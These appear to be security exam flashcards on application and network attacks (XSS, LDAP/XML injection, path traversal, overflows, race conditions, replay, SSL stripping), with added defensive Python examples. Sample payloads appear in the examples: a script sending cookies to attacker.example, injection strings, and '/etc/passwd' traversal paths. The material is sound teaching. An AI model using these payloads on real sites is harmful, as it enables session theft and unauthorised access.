Analyzing Application & Network Attacks Flashcards
(Cross-site scripting)
Non-persistent (reflected) XSS attack
Web site echoes user input back into the page without encoding it, so the input can run as script
– Search box is a common source
• Attacker emails a link that takes advantage of this
vulnerability
– Runs a script that sends credentials/session IDs/cookies
to the attacker
• Script embedded in URL executes in the victim’s browser
– As if it came from the server (same origin, so it can read the site’s cookies and page content)
• Attacker uses credentials/session IDs/cookies to steal
victim’s information without their knowledge
– Very sneaky
(Cross-site scripting)
Persistent (stored) XSS attack
A script that persists on the web site
• Attacker posts a message to a social network
– Includes the malicious payload
• It’s now “persistent” – Everyone gets the payload
– No specific target – All viewers of the page
• For social networking, this can spread quickly
– Everyone who views the message can have it
posted to their page
– Where someone else can view it and propagate it further…
(Cross-site scripting)
Protecting against XSS
• Be careful when clicking untrusted links
– Never blindly click in your email inbox. Never.
• Consider disabling JavaScript
– Or control with an extension
– This offers limited protection
• Keep your browser and applications updated
– Avoid the nasty browser vulnerabilities
• Validate input and encode output
– Don’t allow users to add their own scripts to an
input field
– Encode user data before placing it in the page, so the browser treats it as text rather than markup
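The reflected and stored cards above both come down to the same defect: user data is written into a page as HTML. The following is an added example, not part of the original flashcards, showing the vulnerable rendering next to the encoded one, the kind of link an attacker would e-mail, and the HttpOnly cookie flag that keeps a successful script from reading the session ID. The hostnames and the payload are constructed for illustration.

```python
import html
from urllib.parse import quote

# Constructed sample payload: the classic cookie-stealing script the card describes.
# attacker.example is a placeholder, not a real host.
PAYLOAD = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"


def render_search_unsafe(query: str) -> str:
    """Vulnerable: the search term is copied straight into the page as HTML."""
    return f"<h1>Results for: {query}</h1>"


def render_search_safe(query: str) -> str:
    """Hardened: HTML-encode the term, so <, >, &, quotes become text, not markup."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def reflected_xss_link(base_url: str, query: str) -> str:
    """The link the attacker e-mails: the payload rides in the URL and is reflected back."""
    return f"{base_url}/search?q={quote(query, safe='')}"


def session_cookie_header(session_id: str) -> str:
    """Defense in depth: HttpOnly hides the session cookie from document.cookie,
    Secure keeps it off plain HTTP."""
    return f"Set-Cookie: session={session_id}; Secure; HttpOnly; SameSite=Lax"


def contains_script_tag(page: str) -> bool:
    """Crude check used below: would the browser see a real <script> element?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(reflected_xss_link("https://shop.example", PAYLOAD))
    print(render_search_unsafe(PAYLOAD))   # script tag survives -> executes in the victim's browser
    print(render_search_safe(PAYLOAD))     # &lt;script&gt; -> rendered as harmless text
    print(session_cookie_header("4f3c2a"))
```

Input validation (rejecting obviously hostile strings) is a useful extra layer, but the encoding step is what makes the page safe regardless of what the user typed.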
Privilege escalation
Gain higher-level access to a system
– Exploit a vulnerability – Might be a bug or design flaw
• Higher-level access means more capabilities
– Often this is the highest-level access (administrator or root)
• These are high-priority vulnerability patches
– You want to get these holes closed very quickly
– Otherwise any user can become an administrator
• Horizontal privilege escalation
– User A can access user B’s resources (same privilege level, different account)
Mitigating privilege escalation
Patch quickly
– Fix the vulnerability
• Updated anti-virus/anti-malware software
• Data Execution Prevention (DEP)
– Only memory marked as executable can run as code; data areas such as the stack and heap cannot
• Address space layout randomization (ASLR)
– Randomizes where code and data are placed in memory, so a buffer overrun cannot rely on a known address
Injection Attacks
Code injection
SQL injection
XML injection and LDAP injection
DLL injection
DLL injection
• Dynamic-Link Library
– A Windows library containing code and data
– Many applications can use this library
• Inject a DLL and have an application run a program
– Runs as part of the target process
XML injection and LDAP injection
XML – Extensible Markup Language
– SOAP injection is a variant aimed at SOAP-based web services
• XML injection targets applications that build XML documents or XPath queries from user-controllable input
– Occurs when user input is inserted into the document or query unsafely
– XML metacharacters (<, >, &, quotes) can be used to modify the structure of the document or query
– Performs an unauthorized task
• LDAP injection – Lightweight Directory Access Protocol
– LDAP is often used behind web applications on the Internet or a corporate intranet
– The web application takes input from the client to build a directory query; the attacker exploits input that is not sanitized before it reaches the back-end directory
– Modify LDAP requests to manipulate application results
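Both injections on this card work the same way: a metacharacter in the input changes the structure of what the application builds. The block below is an added example (not from the original flashcards) that constructs an LDAP login filter and an XML user record unsafely and safely, and shows what each attacker input does. The filter format and the attacker strings are the commonly cited ones; the record layout is constructed. The escaping table follows RFC 4515.

```python
import xml.etree.ElementTree as ET

# RFC 4515: these characters must be escaped inside an LDAP filter value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_ldap_value(value: str) -> str:
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def ldap_login_filter_unsafe(username: str, password: str) -> str:
    """Vulnerable: input concatenated straight into the filter."""
    return f"(&(uid={username})(userPassword={password}))"


def ldap_login_filter_safe(username: str, password: str) -> str:
    """Hardened: metacharacters escaped, so input can only ever be a value, never structure."""
    return (f"(&(uid={escape_ldap_value(username)})"
            f"(userPassword={escape_ldap_value(password)}))")


def build_user_xml_unsafe(name: str) -> bytes:
    """Vulnerable: string-building XML lets '<' and '>' in the input become elements."""
    return f"<user><name>{name}</name><role>user</role></user>".encode()


def build_user_xml_safe(name: str) -> bytes:
    """Hardened: let the XML library create the text node; it encodes < > & itself."""
    user = ET.Element("user")
    ET.SubElement(user, "name").text = name
    ET.SubElement(user, "role").text = "user"
    return ET.tostring(user)


def role_from_xml(doc: bytes) -> str:
    """What a back end would do: parse the record and read the first <role>."""
    return ET.fromstring(doc).findtext("role")


def name_from_xml(doc: bytes) -> str:
    return ET.fromstring(doc).findtext("name")


# Constructed attacker inputs
# OWASP's example: the server processes the first complete filter, (&(uid=*)(uid=*)),
# which matches any user; the rest is ignored.
LDAP_INJECTION = "*)(uid=*))(|(uid=*"
# Closes <name>, smuggles in a <role>admin</role> that the parser sees first.
XML_INJECTION = "bob</name><role>admin</role><name>x"

if __name__ == "__main__":
    print(ldap_login_filter_unsafe(LDAP_INJECTION, "x"))
    print(ldap_login_filter_safe(LDAP_INJECTION, "x"))
    print(role_from_xml(build_user_xml_unsafe(XML_INJECTION)))  # admin
    print(role_from_xml(build_user_xml_safe(XML_INJECTION)))    # user
```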
Code injection
Code injection – Adding your own information into a data stream
• Enabled because of bad programming
– The application should properly handle input and output
• So many different data types
– HTML, SQL, XML, LDAP, etc.
(Coding Attacks)
NULL Pointer dereference
A pointer is a programming construct that references a
portion of memory
– A null-pointer dereference occurs when a pointer with a value of NULL is used as if it pointed to a valid memory area
– What happens if that reference points to nothing?
– Application crash, debug information displayed, DoS
(Coding Attacks)
Directory traversal
Directory traversal / path traversal
– Read files from a web server that are outside of the website’s file directory
– Users shouldn’t be able to browse the Windows folder
• Web server software vulnerability
– Won’t stop users from browsing past the web server root
• Web application code vulnerability
– Take advantage of badly written code
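The “badly written code” case is usually a path built from a request parameter. This added example (not from the original flashcards) shows the join-and-normalize mistake next to a check that the resolved path is still under the web root; it also covers the two bypasses a tester tries first, URL-encoded dots and an absolute path. The web root is a constructed value and nothing here touches the real filesystem.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # constructed example root


def resolve_unsafe(web_root: str, requested: str) -> str:
    """Vulnerable: decode, join, normalise, but never check where the result landed.
    posixpath.join discards web_root entirely when `requested` is absolute."""
    return posixpath.normpath(posixpath.join(web_root, unquote(requested)))


def resolve_safe(web_root: str, requested: str):
    """Hardened: treat the request as relative, normalise, then insist the result stays
    under the root. Returns None for anything that escapes.
    On a real filesystem also resolve symlinks (os.path.realpath) before the check."""
    root = posixpath.normpath(web_root)
    relative = unquote(requested).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for req in ["images/../index.html", "../../../etc/passwd",
                "..%2F..%2F..%2Fetc/passwd", "/etc/passwd"]:
        print(f"{req!r:32} unsafe={resolve_unsafe(WEB_ROOT, req)!r:28}"
              f" safe={resolve_safe(WEB_ROOT, req)!r}")
```

Decoding happens before the check because that is the order the server applies; a check run on the still-encoded string would pass `..%2F` straight through.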
(Coding Attacks)
Buffer overflows
Overwriting a buffer of memory
– Spills over into other memory areas
• Developers need to perform bounds checking
– The attackers spend a lot of time looking for openings
• Not a simple exploit
– Takes time to avoid crashing things
– Takes time to make it do what you want
• A really useful buffer overflow is repeatable
– Which means that a system can be compromised
(Coding Attacks)
Integer overflow
Large number into a smaller sized space
– Where does the extra number go?
– In a fixed-size integer the value wraps around, so a large length can become a small or negative one
– You shouldn’t be able to manipulate
memory this way
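Python integers do not overflow, so this added example (not from the original flashcards) reproduces 32-bit wrap-around with a mask and shows the classic consequence: a `count * size` allocation that wraps to a tiny buffer, and a length that wraps negative and slips past a `<= max` check. The numbers are constructed.

```python
U32_MAX = 0xFFFFFFFF


def wrap_u32(value: int) -> int:
    """What a C uint32_t does: keep the low 32 bits, silently drop the rest."""
    return value & U32_MAX


def wrap_i32(value: int) -> int:
    """What a C int32_t does: same truncation, but bit 31 is the sign."""
    v = value & U32_MAX
    return v - 0x100000000 if v & 0x80000000 else v


def fits_u32(count: int, elem_size: int) -> bool:
    """Overflow check done before the multiplication, using only safe arithmetic."""
    if count < 0 or elem_size < 0:
        return False
    return elem_size == 0 or count <= U32_MAX // elem_size


def alloc_size_unsafe(count: int, elem_size: int) -> int:
    """Vulnerable: product computed in 32 bits, result used as a buffer length."""
    return wrap_u32(count * elem_size)


def alloc_size_safe(count: int, elem_size: int) -> int:
    """Hardened: refuse sizes that would wrap instead of allocating a too-small buffer."""
    if not fits_u32(count, elem_size):
        raise OverflowError("count * elem_size exceeds 32 bits")
    return count * elem_size


def length_check_unsafe(length: int, max_len: int = 4096) -> bool:
    """Vulnerable: a signed comparison on a length that may have wrapped negative."""
    return wrap_i32(length) <= max_len   # 0x80000000 wraps to -2147483648 and passes


if __name__ == "__main__":
    count, size = 0x40000001, 4              # 1 073 741 825 elements of 4 bytes
    print(alloc_size_unsafe(count, size))    # 4: buffer far too small, then count writes follow
    print(fits_u32(count, size))             # False
    print(length_check_unsafe(0x80000000))   # True, although the length is huge
```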
(Coding Attacks)
Race Conditions
A programming conundrum
– Sometimes, things happen at the same time
– This can be bad if you’ve not planned for it
• Time-of-check to time-of-use attack (TOCTOU)
– Check the system
– When do you use the results of your last check?
– Something might happen between the check
and the use
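The TOCTOU card in runnable form, as an added example that is not part of the original flashcards: a function checks that a path is not a symlink and then opens it, and a hook standing in for the attacker swaps the file for a symlink in between. The fix is to let the kernel do check and use in one step with `O_NOFOLLOW`. The file names are constructed in a temporary directory; this assumes a POSIX system where `os.O_NOFOLLOW` and symlinks are available.

```python
import os
import tempfile


def read_if_not_symlink_unsafe(path: str, between_check_and_use=None) -> bytes:
    """Vulnerable pattern: check the path, then open the path, as two separate steps."""
    if os.path.islink(path):
        raise PermissionError("refusing to follow a symlink")
    if between_check_and_use:            # stands in for the attacker winning the race
        between_check_and_use()
    with open(path, "rb") as f:          # follows whatever `path` points to *now*
        return f.read()


def read_if_not_symlink_safe(path: str, between_check_and_use=None) -> bytes:
    """Hardened: O_NOFOLLOW makes the open itself fail on a symlink; no separate check."""
    if between_check_and_use:
        between_check_and_use()
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        return os.read(fd, 1 << 16)
    finally:
        os.close(fd)


def demo() -> dict:
    """Run both versions against a constructed race in a temporary directory."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret")          # file the attacker wants read
        target = os.path.join(d, "report.txt")      # file the program intends to read
        with open(secret, "wb") as f:
            f.write(b"TOP SECRET")

        def swap_in_symlink():                      # the attacker's move in the window
            if os.path.lexists(target):
                os.remove(target)
            os.symlink(secret, target)

        def fresh_target():
            if os.path.lexists(target):
                os.remove(target)
            with open(target, "wb") as f:
                f.write(b"harmless report")

        fresh_target()
        results["unsafe"] = read_if_not_symlink_unsafe(target, swap_in_symlink)
        fresh_target()
        try:
            read_if_not_symlink_safe(target, swap_in_symlink)
            results["safe"] = "read succeeded"
        except OSError:                             # ELOOP: open refused the symlink
            results["safe"] = "refused"
    return results


if __name__ == "__main__":
    print(demo())   # {'unsafe': b'TOP SECRET', 'safe': 'refused'}
```

The general rule behind the fix: operate on the file descriptor you already hold (`fstat`, `fchmod`, reads) rather than re-resolving the path name, because the name can change but the descriptor cannot.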
(Coding Attacks)
Improper error handling
Errors happen – And you should probably know about it
• Messages should be just informative enough
– Avoid too much detail
– Network information, memory dump, stack traces, database dumps
• This is an easy one to find and fix
– A development best practice
Improper input handling
Many applications accept user input
– We put data in, we get data back
• All input should be considered malicious
– Check everything. Trust nobody.
• Allowing invalid input can be devastating
– SQL injections, buffer overflows,
denial of service, etc.
• It takes a lot of work to find input that
can be used maliciously
– But they will find it
Replay Attacks
Need access to the raw network data
– Network tap, ARP poisoning, malware on the victim computer
• The gathered information may help the attacker
– Useful information (such as an authentication hash) is transmitted over the network
– Replay the data to appear as someone else
• This is not an on-path attack
– The actual replay doesn’t require
the original workstation
• Avoid this type of replay attack with a salt (a fresh per-session value)
– Use a session ID with the password hash to
create a unique authentication hash each time
– Otherwise a crafty hacker will take advantage of this
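The countermeasure on this card as a small challenge-response exchange, added here as an example and not part of the original flashcards: the server issues a random per-session value, the client mixes it with the password hash, and a captured response is useless both when resent against the same challenge (consumed) and against a new one (different input). The HMAC construction and the one-time challenge set are this example's choices; the password is constructed.

```python
import hashlib
import hmac
import secrets


def static_auth_token(password: str) -> str:
    """Replayable: the same password always puts the same token on the wire."""
    return hashlib.sha256(password.encode()).hexdigest()


def client_response(password_hash: str, challenge: str) -> str:
    """Client side: bind the shared secret (the password hash) to this session's challenge."""
    return hmac.new(bytes.fromhex(password_hash), challenge.encode(), hashlib.sha256).hexdigest()


class Server:
    def __init__(self, password_hash: str):
        self._pw_hash = password_hash
        self._outstanding = set()          # challenges issued but not yet used

    def challenge(self) -> str:
        c = secrets.token_hex(16)          # fresh, unpredictable, per session
        self._outstanding.add(c)
        return c

    def verify(self, challenge: str, response: str) -> bool:
        if challenge not in self._outstanding:
            return False                   # unknown or already consumed: a replay
        self._outstanding.discard(challenge)
        expected = client_response(self._pw_hash, challenge)
        return hmac.compare_digest(expected, response)


def demo_replay() -> dict:
    pw_hash = static_auth_token("correct horse")      # constructed credential
    server = Server(pw_hash)

    c1 = server.challenge()
    r1 = client_response(pw_hash, c1)                 # the pair an eavesdropper captures
    legitimate = server.verify(c1, r1)

    replay_same = server.verify(c1, r1)               # resend the captured pair as-is
    c2 = server.challenge()
    replay_new = server.verify(c2, r1)                # captured response, new challenge
    return {"legitimate": legitimate,
            "replay_same_challenge": replay_same,
            "replay_new_challenge": replay_new}


if __name__ == "__main__":
    print(demo_replay())
```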
API attacks
API - Application Programming Interface
• Attackers look for vulnerabilities in this new
communication path
– Exposing sensitive data, DoS, intercepted
communication, privileged access
• APIs enable communication between applications and end users
– From a car reporting the nearest fuel station to a phone fetching weather and sports updates
– Used everywhere, no matter what devices are connected
SSL stripping / HTTP downgrade
SSL (Secure Sockets Layer) / TLS (Transport Layer Security)
Combines an on-path attack with a downgrade attack
• Attacker must sit in the middle of the conversation
– Must modify data between the victim and web server
– Proxy server, ARP spoofing, rogue Wi-Fi hotspot, etc.
• Victim does not see any significant problem
– Except the browser page isn’t encrypted
– Strips the “S” away from HTTPS (the S stands for secure)
• This is a client and server problem
– Works on SSL and TLS
– Mitigation: HTTP Strict Transport Security (HSTS) tells the browser to use HTTPS only for that site
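What the on-path proxy does to the page, and how a browser that remembers HSTS for the site refuses the downgrade, as an added example that is not part of the original flashcards. The page fragment and host names are constructed; the HSTS header name and behaviour are the real ones.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed fragment of the page the server actually sent over HTTPS.
ORIGINAL_HTML = ('<a href="https://bank.example/login">Log in</a> '
                 '<form action="https://bank.example/pay">')


def strip_https(body: str) -> str:
    """The attacker's rewrite of the response: every https:// link becomes http://,
    so the victim's next click leaves the encrypted channel."""
    return re.sub(r"https://", "http://", body)


class Hsts:
    """Client-side memory of hosts that sent Strict-Transport-Security."""

    def __init__(self):
        self.hosts = set()

    def remember(self, host: str, response_headers: dict) -> None:
        if any(k.lower() == "strict-transport-security" for k in response_headers):
            self.hosts.add(host.lower())

    def upgrade(self, url: str) -> str:
        """Before sending a request: force https for remembered hosts, undoing the strip."""
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname in self.hosts:
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url


if __name__ == "__main__":
    stripped = strip_https(ORIGINAL_HTML)
    print(stripped)
    client = Hsts()
    client.remember("bank.example", {"Strict-Transport-Security": "max-age=31536000"})
    print(client.upgrade("http://bank.example/login"))   # https://bank.example/login
```

The gap a practitioner should keep in mind: the browser only knows the header after a first successful HTTPS visit, so a brand-new visitor is still exposed unless the site is on the browsers' preload list.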
SSL and TLS
• SSL (Secure Sockets Layer) 2.0 - Deprecated in 2011
• SSL 3.0
– Vulnerable to the POODLE attack
– Deprecated in June 2015
• Transport Layer Security (TLS) 1.0
– Upgrade to SSL 3.0, and a name change
from SSL to TLS
– Can downgrade to SSL 3.0
• TLS 1.1
– Deprecated by the major browsers in 2020, along with TLS 1.0; RFC 8996 (2021) formally deprecates both
• TLS 1.2 and TLS 1.3 - The latest standards
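Putting the version history above into a client configuration, as an added example that is not part of the original flashcards: a context that refuses everything below TLS 1.2, and a helper that reports which versions it would still accept. It uses the standard `ssl` module (Python 3.7+ with a modern OpenSSL); nothing here opens a network connection.

```python
import ssl

DEPRECATED = (ssl.TLSVersion.SSLv3, ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_1)
CURRENT = (ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3)


def hardened_client_context() -> ssl.SSLContext:
    """Client context that verifies certificates and will not negotiate below TLS 1.2."""
    ctx = ssl.create_default_context()          # CERT_REQUIRED and hostname checking on
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def would_negotiate(ctx: ssl.SSLContext, offered: ssl.TLSVersion) -> bool:
    """Would this context accept a peer that can only speak `offered`?
    The MINIMUM_/MAXIMUM_SUPPORTED sentinels mean 'whatever OpenSSL allows'."""
    lo, hi = ctx.minimum_version, ctx.maximum_version
    if lo == ssl.TLSVersion.MINIMUM_SUPPORTED:
        lo = ssl.TLSVersion.SSLv3
    if hi == ssl.TLSVersion.MAXIMUM_SUPPORTED:
        hi = ssl.TLSVersion.TLSv1_3
    return lo <= offered <= hi


def accepted_versions(ctx: ssl.SSLContext) -> list:
    return [v.name for v in DEPRECATED + CURRENT if would_negotiate(ctx, v)]


if __name__ == "__main__":
    print(accepted_versions(hardened_client_context()))   # ['TLSv1_2', 'TLSv1_3']
```

Setting `minimum_version` is the supported replacement for the older `OP_NO_SSLv3` / `OP_NO_TLSv1` option flags.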
Driver manipulation examples
Shimming
Refactoring
Shimming
Filling in the space between two objects – A middleman
• Windows includes its own shim
– Backwards compatibility with previous Windows versions
– Application Compatibility Shim Cache
• Malware authors write their own shims
– Get around security (like UAC)
• January 2015 Microsoft vulnerability
– Elevates privilege
Refactoring
Metamorphic malware
– A different program each time it’s downloaded
• Make it appear different each time
– Add NOP instructions
– Loops, pointless code strings
• Can intelligently redesign itself
– Reorder functions
– Modify the application flow
– Reorder code and insert unused data types
• Difficult to match with signature-based detection
– Use a layered approach
Driver
The interaction between the hardware and your
operating system
– They are often trusted
– Great opportunity for security issues
• May 2017 – HP audio drivers
– Conexant audio chips
– Driver installation includes audio control software
– A debugging feature enables a keylogger
• Hardware interactions contain sensitive information
– Video, keyboard, mouse